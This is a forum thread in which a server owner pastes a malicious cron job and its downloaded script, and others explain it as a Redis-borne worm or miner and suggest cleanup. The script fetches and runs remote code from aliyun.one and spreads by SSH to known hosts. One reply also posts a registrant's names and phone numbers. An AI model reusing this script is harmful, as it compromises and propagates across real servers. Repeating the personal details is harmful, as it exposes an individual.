V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
ppd
V2EX  ›  程序员

阿里云服务器被注入了一个 job,有人知道是什么么

  •  
  •   ppd · 2019-11-29 16:04:33 +08:00 · 8005 次点击
    这是一个创建于 1822 天前的主题,其中的信息可能已经有所发展或是发生改变。

    crontab -l:

    */15 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one)|sh

    aliyun.one

    export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin mkdir -p /tmp chmod 1777 /tmp echo "/10 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;print urllib.urlopen("http://aliyun.one").read()')|sh"|crontab - cat > /etc/crontab </dev/null 2>&1 &" & done fi for file in /home/ do if test -d $file; then if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then for h in $(grep -oE "\b([0-9]{1,3}.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL aliyun.one||wget -q -O- aliyun.one||python -c 'import urllib;print urllib.urlopen("http://aliyun.one").read()')|sh >/dev/null 2>&1 &" & done fi fi done #

    大佬们解释一下。

    32 条回复    2019-12-06 14:52:39 +08:00
    taolu
        1
    taolu  
       2019-11-29 16:18:31 +08:00
    肉鸡复肉鸡
    hadoop
        2
    hadoop  
       2019-11-29 16:21:32 +08:00
    挖矿?
    taolu
        3
    taolu  
       2019-11-29 16:27:56 +08:00
    @taolu #1 通俗讲,就是通过你这台主机,ssh 访问已知主机,碰到可以通过密钥登录的主机,就在那台主机执行这段代码
    wangyzj
        4
    wangyzj  
       2019-11-29 16:31:12 +08:00
    应该还有俩相关进程在活着吧
    ppd
        5
    ppd  
    OP
       2019-11-29 16:32:21 +08:00
    @wangyzj 是的,单独杀不掉
    ppd
        6
    ppd  
    OP
       2019-11-29 16:34:42 +08:00
    @taolu 密钥应该是没有暴漏出去的,感觉是通过前几年说的那个 redis 6379 端口搞进来的
    wangyzj
        7
    wangyzj  
       2019-11-29 16:34:46 +08:00
    @ppd 肉鸡无疑了
    删文件
    删 crontab
    解决机器的安全问题
    mcfog
        8
    mcfog  
       2019-11-29 16:34:54 +08:00   ❤️ 1
    如果你不具备信息安全知识,那么这个时候应该做的是销毁这个实例,修改所有这个实例上曾经存在的密钥、密码、token 等信息,重新学习信息安全知识以后再重新开一个实例正确地配置服务,以免损失继续扩大
    eason1874
        9
    eason1874  
       2019-11-29 16:35:30 +08:00
    这么好的域名拿来干这个,可惜
    wszgrcy
        10
    wszgrcy  
       2019-11-29 16:39:35 +08:00 via Android
    @taolu 那么可以反制手动劫持,控制那台用脚本控制的肉鸡?
    taolu
        11
    taolu  
       2019-11-29 16:42:08 +08:00
    @wszgrcy #10 密钥登录是单向的
    qsbaq
        12
    qsbaq  
       2019-11-29 16:51:43 +08:00
    肉鸡变成肉鸡
    ppd
        13
    ppd  
    OP
       2019-11-29 16:55:40 +08:00
    @wangyzj
    阿里云提示
    “该文件极有可能是黑客成功入侵服务器植入的,建议您先根据恶意脚本的标签检查文件内容的合法性并处理”

    @taolu
    果然是 redis 入侵导致的

    进程异常行为-Linux 系统计划任务配置文件写入行为待处理
    备注处理
    该告警由如下引擎检测发现:
    可疑文件路径:/var/spool/cron/temp-1391.rdb
    进程路径:/usr/local/bin/redis-server
    进程 PID:1391
    事件说明:云盾检测到服务器的计划任务配置文件写入行为存在文件变动行为。如果该行为不是您自己主动运行,可能是黑客在尝试向服务器中注入自动计划任务用于持久化入侵,请及时检查告警中的目录文件中是否含有恶意代码。
    shmilypeter
        14
    shmilypeter  
       2019-11-29 17:09:11 +08:00
    备份好文件之后销毁实例,重装吧
    ppd
        15
    ppd  
    OP
       2019-11-29 17:56:08 +08:00
    @mcfog
    @shmilypeter

    无需销毁,有备份镜像
    realpg
        16
    realpg  
       2019-11-29 17:59:36 +08:00
    我猜你是 centos
    Suvigotimor
        17
    Suvigotimor  
       2019-11-29 18:09:35 +08:00
    我怀疑是 redis 无授权登录然后拿 root 之后设定的定时从远程代码托管网站获取肉鸡代码之后控制服务器的...这个好弄,找到它放文件的路径把源头删除了任务也删了,其他的清清重启就好了,redis 一定设置好授权。
    okwork
        18
    okwork  
       2019-11-29 18:25:59 +08:00 via Android
    楼主在安全组里放行了外网的 6379 端口访问?
    mink
        19
    mink  
       2019-11-29 18:51:42 +08:00
    之前我用 docker 拉了 redis 镜像, 也是被挖矿了。
    mcfog
        20
    mcfog  
       2019-11-29 18:54:39 +08:00
    @ppd 销毁是因为你没有这个能力审计出对方到底做了什么事情留了哪些后门,销毁重建是这种情况下最经济的做法
    即使你有信息安全能力,一样应当备份这个被攻击的镜像(离线研究)后销毁这个实例
    ppd
        21
    ppd  
    OP
       2019-11-29 18:57:46 +08:00
    @realpg
    你猜对了
    Tezos
        22
    Tezos  
       2019-11-29 19:07:24 +08:00 via iPhone
    @realpg centos 不背这个锅
    file0X0088
        23
    file0X0088  
       2019-11-29 19:08:15 +08:00
    电话:+86.17006757575+86.013705182121
    注册者:qiu gengmingChong Min She
    注册机构:qiu gengmingSheChongMin
    邮箱:[email protected]@qq.com
    file0X0088
        24
    file0X0088  
       2019-11-29 19:13:01 +08:00
    这个人不太小心啊,信息都暴露了
    ppd
        25
    ppd  
    OP
       2019-11-29 19:45:30 +08:00
    @okwork 是的
    FS1P7dJz
        26
    FS1P7dJz  
       2019-11-29 19:47:03 +08:00
    @file0X0088 并不一定是真实信息
    opengps
        27
    opengps  
       2019-11-29 20:14:50 +08:00 via Android
    这个是定向冒充阿里云的挖矿吧
    superrichman
        28
    superrichman  
       2019-11-29 22:35:04 +08:00
    这 cron job 想跟病毒一样到处传播。

    话说这是第几个 redis 开放公网端口被入侵了的。
    anyforever
        29
    anyforever  
       2019-11-30 19:53:44 +08:00
    4cce1er
        30
    4cce1er  
       2019-12-01 14:17:52 +08:00
    通过 redis 种木马有两个条件:
    1. 空密码并且允许外部直接连接(bind 0.0.0.0)
    2. redis 是 root 权限运行的
    vone
        31
    vone  
       2019-12-05 17:29:36 +08:00
    大数字是在哪里拦截的
    360Netlab Sinkhole Project
    这个页面是 360 网络安全研究院安全 DNS 项目的安全提示页面。
    常见问题
    Q: 这个页面是干什么的?
    这个页面是 360 网络安全研究院( 360netlab )用来重定向不安全域名的页面,您访问到这个页面说明您访问的域名(aliyun.one)可能存在不安全行为。
    不安全行为的域名类型包括但不限于僵尸网络的主控服务器域名,恶意程序的挖矿域名,钓鱼域名以及其他包含不安全行为的黑灰域名等等。
    Q: 我是怎么到这个页面的?
    您使用了 360 公司的安全 DNS 服务之后,安全 DNS 会自动对您请求的域名是否安全进行判定,如果域名被判定为不安全就会跳转到这个页面。
    Q: 你们错误拦截了合法域名,怎么解封?
    360 安全 DNS 仅拦截对用户有不安全行为的域名,在保证用户的上网体验的同时,提高用户上网的安全性。
    阻断的域名列表是 360netlab 利用多种技术手段自动化生成的,并不会基于网站具体内容决定是否拦截。
    如果您是域名的所有者并确定自己的域名没有不安全行为,请点击此处发送邮件到 sinkhole#360.cn(发邮件之前,请把#替换为 @) ,请在邮件中简要说明域名的功能和用途,并注意确保邮件中标明你要解封的域名
    关于 360 网络安全研究院( 360netlab )
    欢迎访问我们的网站 360 网络安全研究院( 360netlab )。

    感谢您使用 360 安全 DNS 服务。
    lifespy
        32
    lifespy  
       2019-12-06 14:52:39 +08:00
    前几天我就发现了。然后我还在隔壁论坛发了个帖子
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   3023 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 26ms · UTC 00:16 · PVG 08:16 · LAX 16:16 · JFK 19:16
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.